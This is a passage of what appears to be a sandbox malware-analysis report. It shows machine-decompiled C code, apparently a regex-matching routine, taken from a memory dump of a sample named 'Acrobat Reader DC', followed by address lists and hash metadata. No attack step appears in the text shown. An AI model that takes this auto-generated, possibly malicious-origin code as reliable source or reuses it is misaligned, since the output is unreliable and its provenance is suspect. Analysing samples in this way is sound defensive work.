                                  																													if( *_t578 != _v156) {
                                  																														goto L129;
                                  																													} else {
                                  																														__eflags = _v172 - 1;
                                  																														if(_v172 != 1) {
                                  																															__eflags =  *((intOrPtr*)(_t578 + 1)) - _v155;
                                  																															if( *((intOrPtr*)(_t578 + 1)) != _v155) {
                                  																																goto L129;
                                  																															}
                                  																														}
                                  																													}
                                  																												}
                                  																											} else {
                                  																												__eflags = _t461 - _v96;
                                  																												if(_t461 <= _v96) {
                                  																													L129:
                                  																													_t461 = _t461 + 1;
                                  																													__eflags = _t461 - _t526;
                                  																													if(_t461 < _t526) {
                                  																														while(1) {
                                  																															__eflags = ( *_t461 & 0x000000c0) - 0x80;
                                  																															if(( *_t461 & 0x000000c0) != 0x80) {
                                  																																goto L133;
                                  																															}
                                  																															_t461 = _t461 + 1;
                                  																															__eflags = _t461 - _t526;
                                  																															if(_t461 < _t526) {
                                  																																continue;
                                  																															} else {
                                  																															}
                                  																															goto L145;
                                  																														}
                                  																														goto L133;
                                  																													}
                                  																												} else {
                                  																													_t428 = E0042E7E1(_t461, _v176, _v96,  &_v172, _v16);
                                  																													_t526 = _a4;
                                  																													_t592 = _t592 + 0x14;
                                  																													__eflags = _t428;
                                  																													if(_t428 == 0) {
                                  																														goto L129;
                                  																													}
                                  																												}
                                  																											}
                                  																											goto L145;
                                  																											L133:
                                  																											__eflags = _t461 - _t526;
                                  																										}
                                  																									}
                                  																									L145:
                                  																									__eflags =  *((char*)(_t461 - 1)) - 0xd;
                                  																									if( *((char*)(_t461 - 1)) == 0xd) {
                                  																										_t419 = _v176;
                                  																										__eflags = _t419 - 1;
                                  																										if(_t419 == 1) {
                                  																											L148:
                                  																											__eflags = _t461 - _t526;
                                  																											if(_t461 < _t526) {
                                  																												__eflags =  *_t461 - 0xa;
                                  																												if( *_t461 == 0xa) {
                                  																													_t461 = _t461 + 1;
                                  																													__eflags = _t461;
                                  																												}
                                  																											}
                                  																										} else {
                                  																											__eflags = _t419 - 2;
                                  																											if(_t419 == 2) {
                                  																												goto L148;
                                  																											}
                                  																										}
                                  																									}
                                  																								}
                                  																							}
                                  																						} else {
                                  																							__eflags = _v36;
                                  																							if(_v36 == 0) {
                                  																								__eflags = _t461 - _t526;
                                  																								if(_t461 < _t526) {
                                  																									while(1) {
                                  																										__eflags = ( *_t461 & 0x000000ff) - _t418;
                                  																										if(( *_t461 & 0x000000ff) == _t418) {
                                  																											goto L151;
                                  																										}
                                  																										_t461 = _t461 + 1;
                                  																										__eflags = _t461 - _t526;
                                  																										if(_t461 < _t526) {
                                  																											continue;
                                  																										} else {
                                  																										}
                                  																										goto L151;
                                  																									}
                                  																								}
                                  																							} else {
                                  																								__eflags = _t461 - _t526;
                                  																								if(_t461 < _t526) {
                                  																									while(1) {
                                  																										_t487 =  *_t461 & 0x000000ff;
                                  																										_t579 = _v152;
                                  																										__eflags = ( *(_t487 + _t579) & 0x000000ff) - _t418;
                                  																										if(( *(_t487 + _t579) & 0x000000ff) == _t418) {
                                  																											goto L151;
                                  																										}
                                  																										_t461 = _t461 + 1;
                                  																										__eflags = _t461 - _t526;
                                  																										if(_t461 < _t526) {
                                  																											continue;
                                  																										} else {
                                  																										}
                                  																										goto L151;
                                  																									}
                                  																								}
                                  																							}
                                  																						}
                                  																					}
                                  																					L151:
                                  																					__eflags = _v236;
                                  																					_t527 = _v24;
                                  																					_a4 = _t527;
                                  																					if(_v236 != 0) {
                                  																						L168:
                                  																						_t528 = _v240;
                                  																						_v88 = _t461;
                                  																						_v80 = _t461;
                                  																						_v200 = 0;
                                  																						_t391 = E00437262(_t461, _v100, _t461, 0, 2,  &_v200, _t528, 0, 0, 0);
                                  																						_t569 = _v20;
                                  																						_t592 = _t592 + 0x28;
                                  																						__eflags = _v108;
                                  																						_v12 = _t391;
                                  																						if(_v108 != 0) {
                                  																							__eflags = _t569;
                                  																							if(_t569 == 0) {
                                  																								_v20 = _v80;
                                  																							}
                                  																						}
                                  																						__eflags = _t391;
                                  																						if(__eflags > 0) {
                                  																							L202:
                                  																							__eflags = _t391 - 1;
                                  																							if(_t391 == 1) {
                                  																								L215:
                                  																								__eflags = _v32;
                                  																								_t586 = _a28;
                                  																								if(_v32 != 0) {
                                  																									__eflags = _t586 - 4;
                                  																									if(_t586 >= 4) {
                                  																										__eflags = _a24 + 8;
                                  																										E00410E60(_a24 + 8, _v188 + 8, _t586 * 4 - 8);
                                  																										_t592 = _t592 + 0xc;
                                  																									}
                                  																									__eflags = _v72 - _t586;
                                  																									if(_v72 > _t586) {
                                  																										_v144 = 1;
                                  																									}
                                  																									_t528 = _v188;
                                  																									 *0x491494(_t528);
                                  																								}
                                  																								__eflags = _v144;
                                  																								if(_v144 == 0) {
                                  																									asm("cdq");
                                  																									_t393 = _v72 - _t528;
                                  																									__eflags = _t393;
                                  																									_t394 = _t393 >> 1;
                                  																								} else {
                                  																									_t394 = 0;
                                  																								}
                                  																								__eflags = _t586 - 2;
                                  																								if(_t586 >= 2) {
                                  																									_t468 = _v96;
                                  																									_t529 = _a24;
                                  																									 *_t529 = _v88 - _t468;
                                  																									_t590 = _v84 - _t468;
                                  																									__eflags = _t590;
                                  																									 *(_t529 + 4) = _t590;
                                  																									return _t394;
                                  																								} else {
                                  																									__eflags = 0;
                                  																									return 0;
                                  																								}
                                  																							} else {
                                  																								__eflags = _t391 - 0xfffffc19;
                                  																								if(_t391 == 0xfffffc19) {
                                  																									goto L215;
                                  																								} else {
                                  																									goto L204;
                                  																								}
                                  																							}
                                  																						} else {
                                  																							if(__eflags == 0) {
                                  																								L176:
                                  																								__eflags = _v16;
                                  																								_t572 = _t461 + 1;
                                  																								if(_v16 != 0) {
                                  																									_t391 = _v24;
                                  																									__eflags = _t572 - _t391;
                                  																									if(_t572 < _t391) {
                                  																										while(1) {
                                  																											__eflags = ( *_t572 & 0x000000c0) - 0x80;
                                  																											if(( *_t572 & 0x000000c0) != 0x80) {
                                  																												goto L181;
                                  																											}
                                  																											_t572 =  &(_t572[0]);
                                  																											__eflags = _t572 - _t391;
                                  																											if(_t572 < _t391) {
                                  																												continue;
                                  																											}
                                  																											goto L181;
                                  																										}
                                  																									}
                                  																								}
                                  																								goto L181;
                                  																							} else {
                                  																								_t272 = _t391 + 0x3e6; // 0x3e6
                                  																								_t504 = _t272;
                                  																								__eflags = _t504 - 4;
                                  																								if(_t504 > 4) {
                                  																									goto L202;
                                  																								} else {
                                  																									switch( *((intOrPtr*)(_t504 * 4 +  &M00447143))) {
                                  																										case 0:
                                  																											goto L205;
                                  																										case 1:
                                  																											goto L176;
                                  																										case 2:
                                  																											_t572 = _v88;
                                  																											__eflags = _t572 - _t461;
                                  																											if(_t572 == _t461) {
                                  																												goto L176;
                                  																											}
                                  																											L181:
                                  																											__eflags = _v208;
                                  																											_t473 = _v176;
                                  																											_v12 = 0;
                                  																											if(_v208 == 0) {
                                  																												L190:
                                  																												__eflags = _v212;
                                  																												_t461 = _t572;
                                  																												if(_v212 != 0) {
                                  																													goto L204;
                                  																												} else {
                                  																													__eflags = _t572 - _v24;
                                  																													if(_t572 > _v24) {
                                  																														goto L204;
                                  																													} else {
                                  																														__eflags =  *((char*)(_t572 - 1)) - 0xd;
                                  																														if( *((char*)(_t572 - 1)) == 0xd) {
                                  																															__eflags = _t572 - _v24;
                                  																															if(_t572 < _v24) {
                                  																																__eflags =  *_t572 - 0xa;
                                  																																if( *_t572 == 0xa) {
                                  																																	__eflags =  *(_t585 + 0xc) & 0x00000020;
                                  																																	if(( *(_t585 + 0xc) & 0x00000020) == 0) {
                                  																																		__eflags = _t473 - 1;
                                  																																		if(_t473 == 1) {
                                  																																			L199:
                                  																																			_t461 =  &(_t572[0]);
                                  																																		} else {
                                  																																			__eflags = _t473 - 2;
                                  																																			if(_t473 == 2) {
                                  																																				goto L199;
                                  																																			} else {
                                  																																				__eflags = _v172 - 2;
                                  																																				if(_v172 == 2) {
                                  																																					goto L199;
                                  																																				}
                                  																																			}
                                  																																		}
                                  																																	}
                                  																																}
                                  																															}
                                  																														}
                                  																														_t466 = _v220;
                                  																														_v44 = 0;
                                  																														goto L75;
                                  																													}
                                  																												}
                                  																											} else {
                                  																												__eflags = _t473;
                                  																												if(_t473 == 0) {
                                  																													_t391 = _v172;
                                  																													__eflags = _t461 - _v92 - _t391;
                                  																													if(_t461 > _v92 - _t391) {
                                  																														goto L190;
                                  																													} else {
                                  																														__eflags =  *_t461 - _v156;
                                  																														if( *_t461 != _v156) {
                                  																															goto L190;
                                  																														} else {
                                  																															__eflags = _t391 - 1;
                                  																															if(_t391 == 1) {
                                  																																goto L204;
                                  																															} else {
                                  																																_t391 =  *(_t461 + 1);
                                  																																__eflags = _t391 - _v155;
                                  																																if(_t391 == _v155) {
                                  																																	goto L204;
                                  																																} else {
                                  																																	goto L190;
                                  																																}
                                  																															}
                                  																														}
                                  																													}
                                  																												} else {
                                  																													_t391 = _v92;
                                  																													__eflags = _t461 - _t391;
                                  																													if(_t461 >= _t391) {
                                  																														goto L190;
                                  																													} else {
                                  																														_t391 = E0042E9B5(_t461, _t473, _t391,  &_v172, _v16);
                                  																														_t592 = _t592 + 0x14;
                                  																														__eflags = _t391;
                                  																														if(_t391 != 0) {
                                  																															goto L204;
                                  																														} else {
                                  																															_t473 = _v176;
                                  																															goto L190;
                                  																														}
                                  																													}
                                  																												}
                                  																											}
                                  																											goto L230;
                                  																									}
                                  																								}
                                  																							}
                                  																						}
                                  																					} else {
                                  																						__eflags = _v76;
                                  																						if(_v76 != 0) {
                                  																							goto L168;
                                  																						} else {
                                  																							_t574 = _v228;
                                  																							__eflags = _t574;
                                  																							if(_t574 < 0) {
                                  																								goto L168;
                                  																							} else {
                                  																								__eflags = _t527 - _t461 - 0x3e8;
                                  																								if(_t527 - _t461 >= 0x3e8) {
                                  																									goto L168;
                                  																								} else {
                                  																									__eflags = _v28;
                                  																									_t391 = (0 | _v28 >= 0x00000000) + _t461;
                                  																									__eflags = _t391 - _v216;
                                  																									if(_t391 <= _v216) {
                                  																										goto L168;
                                  																									} else {
                                  																										__eflags = _v224;
                                  																										if(_v224 == 0) {
                                  																											__eflags = _t391 - _t527;
                                  																											if(_t391 >= _t527) {
                                  																												goto L161;
                                  																											} else {
                                  																												while(1) {
                                  																													_t476 =  *_t391 & 0x000000ff;
                                  																													_t391 = _t391 + 1;
                                  																													__eflags = _t476 - _t574;
                                  																													if(_t476 == _t574) {
                                  																														goto L166;
                                  																													}
                                  																													__eflags = _t391 - _t527;
                                  																													if(_t391 < _t527) {
                                  																														continue;
                                  																													} else {
                                  																														_v12 = 0;
                                  																														goto L204;
                                  																													}
                                  																													goto L230;
                                  																												}
                                  																												goto L166;
                                  																											}
                                  																										} else {
                                  																											__eflags = _t391 - _t527;
                                  																											if(_t391 >= _t527) {
                                  																												L161:
                                  																												_v12 = 0;
                                  																												L204:
                                  																												_t591 = _v12;
                                  																												_t570 = _v20;
                                  																												L205:
                                  																												__eflags = _v32;
                                  																												if(_v32 != 0) {
                                  																													_t391 =  *0x491494(_v188);
                                  																												}
                                  																												__eflags = _t591;
                                  																												if(_t591 == 0) {
                                  																													L210:
                                  																													__eflags = _t570;
                                  																													if(_t570 == 0) {
                                  																														_t400 = _t391 | 0xffffffff;
                                  																														__eflags = _t400;
                                  																														return _t400;
                                  																													} else {
                                  																														__eflags = _a28 - 1;
                                  																														if(_a28 > 1) {
                                  																															_t471 = _a8;
                                  																															_t402 = _a24;
                                  																															_t532 = _v24 - _t471;
                                  																															__eflags = _t532;
                                  																															 *_t402 = _t570 - _t471;
                                  																															 *(_t402 + 4) = _t532;
                                  																														}
                                  																														return 0xfffffff4;
                                  																													}
                                  																												} else {
                                  																													__eflags = _t591 - 0xfffffff4;
                                  																													if(_t591 == 0xfffffff4) {
                                  																														goto L210;
                                  																													} else {
                                  																														return _t591;
                                  																													}
                                  																												}
                                  																											} else {
                                  																												while(1) {
                                  																													_t477 =  *_t391 & 0x000000ff;
                                  																													_t391 = _t391 + 1;
                                  																													__eflags = _t477 - _t574;
                                  																													if(_t477 == _t574) {
                                  																														break;
                                  																													}
                                  																													__eflags = _t477 - _v204;
                                  																													if(_t477 == _v204) {
                                  																														break;
                                  																													} else {
                                  																														__eflags = _t391 - _t527;
                                  																														if(_t391 < _t527) {
                                  																															continue;
                                  																														} else {
                                  																															goto L161;
                                  																														}
                                  																													}
                                  																													goto L230;
                                  																												}
                                  																												L166:
                                  																												_t391 = _t391 - 1;
                                  																												__eflags = _t391 - _t527;
                                  																												if(_t391 >= _t527) {
                                  																													goto L161;
                                  																												} else {
                                  																													_v216 = _t391;
                                  																													goto L168;
                                  																												}
                                  																											}
                                  																										}
                                  																									}
                                  																								}
                                  																							}
                                  																						}
                                  																					}
                                  																					goto L230;
                                  																				}
                                  																			} else {
                                  																				return 0xfffffffa;
                                  																			}
                                  																		}
                                  																	}
                                  																} else {
                                  																	__eflags = _a20 & 0x00002000;
                                  																	if((_a20 & 0x00002000) != 0) {
                                  																		goto L57;
                                  																	} else {
                                  																		_t584 = _a12;
                                  																		_t447 = E0042E688(_t522, _t584);
                                  																		_t592 = _t592 + 8;
                                  																		__eflags = _t447;
                                  																		if(_t447 < 0) {
                                  																			_t448 = _a16;
                                  																			__eflags = _t448;
                                  																			if(_t448 <= 0) {
                                  																				goto L57;
                                  																			} else {
                                  																				__eflags = _t448 - _t584;
                                  																				if(_t448 >= _t584) {
                                  																					goto L57;
                                  																				} else {
                                  																					__eflags = ( *_t461 & 0x000000c0) - 0x80;
                                  																					if(( *_t461 & 0x000000c0) != 0x80) {
                                  																						goto L57;
                                  																					} else {
                                  																						return 0xfffffff5;
                                  																					}
                                  																				}
                                  																			}
                                  																		} else {
                                  																			__eflags = _t447 - _t584;
                                  																			if(_t447 != _t584) {
                                  																				L52:
                                  																				return 0xfffffff6;
                                  																			} else {
                                  																				__eflags = _v76 - 1;
                                  																				if(_v76 > 1) {
                                  																					return 0xffffffe7;
                                  																				} else {
                                  																					goto L52;
                                  																				}
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  															} else {
                                  																__eflags =  *(_t585 + 0xc) & 0x00000001;
                                  																if(( *(_t585 + 0xc) & 0x00000001) == 0) {
                                  																	goto L47;
                                  																} else {
                                  																	return 0xfffffff3;
                                  																}
                                  															}
                                  														} else {
                                  															__eflags = _t463 - 0x200000;
                                  															if(_t463 != 0x200000) {
                                  																goto L22;
                                  															} else {
                                  																goto L34;
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  										} else {
                                  											__eflags = _t371 - 0x1000000;
                                  											if(_t371 == 0x1000000) {
                                  												L26:
                                  												_v104 = 0;
                                  												goto L27;
                                  											} else {
                                  												L22:
                                  												return 0xffffffe9;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									_t585 = E00437144(__eflags, _t585,  &_v280, 0,  &_v324);
                                  									_t592 = _t592 + 0x10;
                                  									__eflags = _t585;
                                  									if(_t585 != 0) {
                                  										_t462 = _a20;
                                  										goto L16;
                                  									} else {
                                  										_t35 = _t585 - 4; // -4
                                  										return _t35;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						return 0xfffffff1;
                                  					}
                                  				} else {
                                  					return 0xfffffffd;
                                  				}
                                  				L230:
                                  			}
                                  0x00446a13
                                  0x00446a19
                                  0x00446a1b
                                  0x00446a29
                                  0x00446a3b
                                  0x00446a4c
                                  0x00446a52
                                  0x00446a58
                                  0x00446a62
                                  0x00446a6d
                                  0x00446a71
                                  0x00446a77
                                  0x00446a7a
                                  0x00446a7c
                                  0x00446a7e
                                  0x00446a7e
                                  0x00446a84
                                  0x00446a8b
                                  0x00446a8d
                                  0x00446a93
                                  0x00446a98
                                  0x00446aa4
                                  0x00446aa7
                                  0x00446aaa
                                  0x00446aac
                                  0x00446aae
                                  0x00446ab4
                                  0x00446ab7
                                  0x00446ab7
                                  0x00446aac
                                  0x00446abb
                                  0x00446ac2
                                  0x00446ac4
                                  0x00446ac8
                                  0x00446aca
                                  0x00446ace
                                  0x00446ad1
                                  0x00446ad4
                                  0x00446ad9
                                  0x00446baf
                                  0x00446adf
                                  0x00446ae9
                                  0x00446af0
                                  0x00446af0
                                  0x00446ad9
                                  0x00446ac8
                                  0x00446af3
                                  0x00446af7
                                  0x00446af9
                                  0x00446afd
                                  0x00446b03
                                  0x00446b03
                                  0x00446b06
                                  0x00446b0f
                                  0x00446b1d
                                  0x00446b1d
                                  0x00446b26
                                  0x00446b26
                                  0x00446b2b
                                  0x00446b31
                                  0x00446b31
                                  0x00446b31
                                  0x00446b37
                                  0x00446b3a
                                  0x00446b3d
                                  0x00446b3f
                                  0x00446b41
                                  0x00446b44
                                  0x00446b46
                                  0x00446b51
                                  0x00446b51
                                  0x00446b54
                                  0x00446b54
                                  0x00446b54
                                  0x00446b46
                                  0x00446b56
                                  0x00446b5d
                                  0x00000000
                                  0x00000000
                                  0x00446b63
                                  0x00446b67
                                  0x00446b6a
                                  0x00446b6c
                                  0x00446c0c
                                  0x00446c0e
                                  0x00446c10
                                  0x00446c10
                                  0x00446c17
                                  0x00446c3f
                                  0x00446c49
                                  0x00446c4b
                                  0x00000000
                                  0x00446c4d
                                  0x00446c53
                                  0x00446c55
                                  0x00000000
                                  0x00446c57
                                  0x00446c57
                                  0x00446c5a
                                  0x00446c62
                                  0x00446c65
                                  0x00000000
                                  0x00000000
                                  0x00446c65
                                  0x00446c5a
                                  0x00446c55
                                  0x00446c19
                                  0x00446c2e
                                  0x00446c33
                                  0x00446c36
                                  0x00446c38
                                  0x00446c3a
                                  0x00000000
                                  0x00446c3a
                                  0x00446c38
                                  0x00000000
                                  0x00446c67
                                  0x00446c67
                                  0x00446c68
                                  0x00446c68
                                  0x00446c10
                                  0x00446b72
                                  0x00446b72
                                  0x00446b74
                                  0x00446b7a
                                  0x00446b7a
                                  0x00446b81
                                  0x00446bbd
                                  0x00446bc5
                                  0x00446bc7
                                  0x00000000
                                  0x00446bc9
                                  0x00446bcb
                                  0x00446bd1
                                  0x00000000
                                  0x00446bd3
                                  0x00446bd3
                                  0x00446bd6
                                  0x00446bdf
                                  0x00446be5
                                  0x00000000
                                  0x00000000
                                  0x00446be5
                                  0x00446bd6
                                  0x00446bd1
                                  0x00446b83
                                  0x00446b9a
                                  0x00446b9f
                                  0x00446ba2
                                  0x00446ba4
                                  0x00446baa
                                  0x00446beb
                                  0x00446beb
                                  0x00446bec
                                  0x00446bee
                                  0x00446bf0
                                  0x00446bf5
                                  0x00446bf8
                                  0x00000000
                                  0x00000000
                                  0x00446bfa
                                  0x00446bfb
                                  0x00446bfd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446bfd
                                  0x00446bf0
                                  0x00000000
                                  0x00446bee
                                  0x00446ba4
                                  0x00000000
                                  0x00446bff
                                  0x00446bff
                                  0x00446c02
                                  0x00446c02
                                  0x00446c0a
                                  0x00446b74
                                  0x00446c6c
                                  0x00446c6c
                                  0x00446c6e
                                  0x00446c71
                                  0x00446c74
                                  0x00446c77
                                  0x00446c7c
                                  0x00446c82
                                  0x00446c85
                                  0x00446c87
                                  0x00446ce0
                                  0x00446ce7
                                  0x00446cf3
                                  0x00446cf5
                                  0x00446cfb
                                  0x00446cff
                                  0x00446da4
                                  0x00446da6
                                  0x00446da8
                                  0x00446daf
                                  0x00446de5
                                  0x00446de7
                                  0x00000000
                                  0x00446de9
                                  0x00446df1
                                  0x00446df7
                                  0x00446df9
                                  0x00000000
                                  0x00446dfb
                                  0x00446dfb
                                  0x00446e02
                                  0x00446e0a
                                  0x00446e0d
                                  0x00000000
                                  0x00000000
                                  0x00446e0d
                                  0x00446e02
                                  0x00446df9
                                  0x00446db1
                                  0x00446db1
                                  0x00446db4
                                  0x00000000
                                  0x00446db6
                                  0x00446dcb
                                  0x00446dd0
                                  0x00446dd3
                                  0x00446dd6
                                  0x00446dd8
                                  0x00000000
                                  0x00446dda
                                  0x00446dd8
                                  0x00446db4
                                  0x00000000
                                  0x00446e0f
                                  0x00446e0f
                                  0x00446e10
                                  0x00446e10
                                  0x00446d05
                                  0x00446d05
                                  0x00446d07
                                  0x00446d0d
                                  0x00446d14
                                  0x00446d50
                                  0x00446d52
                                  0x00000000
                                  0x00446d54
                                  0x00446d5c
                                  0x00446d62
                                  0x00446d64
                                  0x00000000
                                  0x00446d66
                                  0x00446d66
                                  0x00446d6d
                                  0x00446d79
                                  0x00446d7c
                                  0x00000000
                                  0x00000000
                                  0x00446d7c
                                  0x00446d6d
                                  0x00446d64
                                  0x00446d16
                                  0x00446d16
                                  0x00446d19
                                  0x00446d82
                                  0x00446d82
                                  0x00446d83
                                  0x00446d85
                                  0x00446d8b
                                  0x00446d8f
                                  0x00446d91
                                  0x00000000
                                  0x00000000
                                  0x00446d93
                                  0x00446d94
                                  0x00446d96
                                  0x00000000
                                  0x00000000
                                  0x00446d98
                                  0x00000000
                                  0x00446d96
                                  0x00000000
                                  0x00446d8b
                                  0x00446d1b
                                  0x00446d32
                                  0x00446d37
                                  0x00446d3a
                                  0x00446d3d
                                  0x00446d3f
                                  0x00000000
                                  0x00446d45
                                  0x00446d3f
                                  0x00446d19
                                  0x00000000
                                  0x00446d9a
                                  0x00446d9a
                                  0x00446d9a
                                  0x00446d07
                                  0x00446e14
                                  0x00446e14
                                  0x00446e18
                                  0x00446e1a
                                  0x00446e20
                                  0x00446e23
                                  0x00446e2a
                                  0x00446e2a
                                  0x00446e2c
                                  0x00446e2e
                                  0x00446e31
                                  0x00446e33
                                  0x00446e33
                                  0x00446e33
                                  0x00446e31
                                  0x00446e25
                                  0x00446e25
                                  0x00446e28
                                  0x00000000
                                  0x00000000
                                  0x00446e28
                                  0x00446e23
                                  0x00446e18
                                  0x00446cf5
                                  0x00446c89
                                  0x00446c89
                                  0x00446c8d
                                  0x00446cba
                                  0x00446cbc
                                  0x00446ccb
                                  0x00446cce
                                  0x00446cd0
                                  0x00000000
                                  0x00000000
                                  0x00446cd6
                                  0x00446cd7
                                  0x00446cd9
                                  0x00000000
                                  0x00000000
                                  0x00446cdb
                                  0x00000000
                                  0x00446cd9
                                  0x00446ccb
                                  0x00446c8f
                                  0x00446c8f
                                  0x00446c91
                                  0x00446c9b
                                  0x00446c9b
                                  0x00446c9e
                                  0x00446ca8
                                  0x00446caa
                                  0x00000000
                                  0x00000000
                                  0x00446cb0
                                  0x00446cb1
                                  0x00446cb3
                                  0x00000000
                                  0x00000000
                                  0x00446cb5
                                  0x00000000
                                  0x00446cb3
                                  0x00446c9b
                                  0x00446c91
                                  0x00446c8d
                                  0x00446c87
                                  0x00446e3b
                                  0x00446e3b
                                  0x00446e42
                                  0x00446e45
                                  0x00446e48
                                  0x00446ed4
                                  0x00446ed4
                                  0x00446ef2
                                  0x00446ef5
                                  0x00446ef8
                                  0x00446f02
                                  0x00446f07
                                  0x00446f0a
                                  0x00446f0d
                                  0x00446f11
                                  0x00446f14
                                  0x00446f16
                                  0x00446f18
                                  0x00446f1d
                                  0x00446f1d
                                  0x00446f18
                                  0x00446f20
                                  0x00446f22
                                  0x0044702f
                                  0x0044702f
                                  0x00447032
                                  0x0044709b
                                  0x0044709b
                                  0x0044709f
                                  0x004470a2
                                  0x004470a4
                                  0x004470a7
                                  0x004470be
                                  0x004470c2
                                  0x004470c7
                                  0x004470c7
                                  0x004470ca
                                  0x004470cd
                                  0x004470cf
                                  0x004470cf
                                  0x004470d9
                                  0x004470e0
                                  0x004470e6
                                  0x004470e9
                                  0x004470f0
                                  0x004470f9
                                  0x004470fa
                                  0x004470fa
                                  0x004470fc
                                  0x004470f2
                                  0x004470f2
                                  0x004470f2
                                  0x004470fe
                                  0x00447101
                                  0x0044710c
                                  0x00447112
                                  0x00447117
                                  0x0044711c
                                  0x0044711c
                                  0x0044711e
                                  0x00447127
                                  0x00447103
                                  0x00447103
                                  0x0044710b
                                  0x0044710b
                                  0x00447034
                                  0x00447034
                                  0x00447039
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447039
                                  0x00446f28
                                  0x00446f28
                                  0x00446f47
                                  0x00446f47
                                  0x00446f4b
                                  0x00446f4e
                                  0x00446f50
                                  0x00446f53
                                  0x00446f55
                                  0x00446f5b
                                  0x00446f60
                                  0x00446f63
                                  0x00000000
                                  0x00000000
                                  0x00446f65
                                  0x00446f66
                                  0x00446f68
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446f68
                                  0x00446f5b
                                  0x00446f55
                                  0x00000000
                                  0x00446f2a
                                  0x00446f2a
                                  0x00446f2a
                                  0x00446f30
                                  0x00446f33
                                  0x00000000
                                  0x00446f39
                                  0x00446f39
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446f40
                                  0x00446f43
                                  0x00446f45
                                  0x00000000
                                  0x00000000
                                  0x00446f6a
                                  0x00446f6a
                                  0x00446f71
                                  0x00446f77
                                  0x00446f7e
                                  0x00446fda
                                  0x00446fda
                                  0x00446fe1
                                  0x00446fe3
                                  0x00000000
                                  0x00446fe5
                                  0x00446fe5
                                  0x00446fe8
                                  0x00000000
                                  0x00446fea
                                  0x00446fea
                                  0x00446fee
                                  0x00446ff0
                                  0x00446ff3
                                  0x00446ff5
                                  0x00446ff8
                                  0x00446ffa
                                  0x00446ffe
                                  0x00447000
                                  0x00447003
                                  0x00447016
                                  0x00447016
                                  0x00447005
                                  0x0044700a
                                  0x0044700c
                                  0x00000000
                                  0x0044700e
                                  0x0044700e
                                  0x00447014
                                  0x00000000
                                  0x00000000
                                  0x00447014
                                  0x0044700c
                                  0x00447003
                                  0x00446ffe
                                  0x00446ff8
                                  0x00446ff3
                                  0x00447019
                                  0x0044701f
                                  0x00000000
                                  0x0044701f
                                  0x00446fe8
                                  0x00446f80
                                  0x00446f80
                                  0x00446f82
                                  0x00446fb4
                                  0x00446fbc
                                  0x00446fbe
                                  0x00000000
                                  0x00446fc0
                                  0x00446fc2
                                  0x00446fc8
                                  0x00000000
                                  0x00446fca
                                  0x00446fca
                                  0x00446fcd
                                  0x00000000
                                  0x00446fcf
                                  0x00446fcf
                                  0x00446fd2
                                  0x00446fd8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446fd8
                                  0x00446fcd
                                  0x00446fc8
                                  0x00446f84
                                  0x00446f84
                                  0x00446f87
                                  0x00446f89
                                  0x00000000
                                  0x00446f8b
                                  0x00446f99
                                  0x00446f9e
                                  0x00446fa1
                                  0x00446fa3
                                  0x00000000
                                  0x00446fa9
                                  0x00446fa9
                                  0x00000000
                                  0x00446fa9
                                  0x00446fa3
                                  0x00446f89
                                  0x00446f82
                                  0x00000000
                                  0x00000000
                                  0x00446f39
                                  0x00446f33
                                  0x00446f28
                                  0x00446e4e
                                  0x00446e4e
                                  0x00446e52
                                  0x00000000
                                  0x00446e58
                                  0x00446e58
                                  0x00446e5e
                                  0x00446e60
                                  0x00000000
                                  0x00446e62
                                  0x00446e66
                                  0x00446e6c
                                  0x00000000
                                  0x00446e6e
                                  0x00446e70
                                  0x00446e76
                                  0x00446e78
                                  0x00446e7e
                                  0x00000000
                                  0x00446e80
                                  0x00446e80
                                  0x00446e87
                                  0x00446ead
                                  0x00446eaf
                                  0x00000000
                                  0x00446eb1
                                  0x00446eb1
                                  0x00446eb1
                                  0x00446eb4
                                  0x00446eb5
                                  0x00446eb7
                                  0x00000000
                                  0x00000000
                                  0x00446eb9
                                  0x00446ebb
                                  0x00000000
                                  0x00446ebd
                                  0x00446ebd
                                  0x00000000
                                  0x00446ebd
                                  0x00000000
                                  0x00446ebb
                                  0x00000000
                                  0x00446eb1
                                  0x00446e89
                                  0x00446e89
                                  0x00446e8b
                                  0x00446ea1
                                  0x00446ea1
                                  0x0044703b
                                  0x0044703b
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                  • API String ID: 0-2872873767
                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004443FC(intOrPtr _a4, char* _a8) {
                                  				signed int _v99;
                                  				signed int _v100;
                                  				signed int _v169;
                                  				signed int _v242;
                                  				signed int _v243;
                                  				signed int _v244;
                                  				char _v260;
                                  				void* _t53;
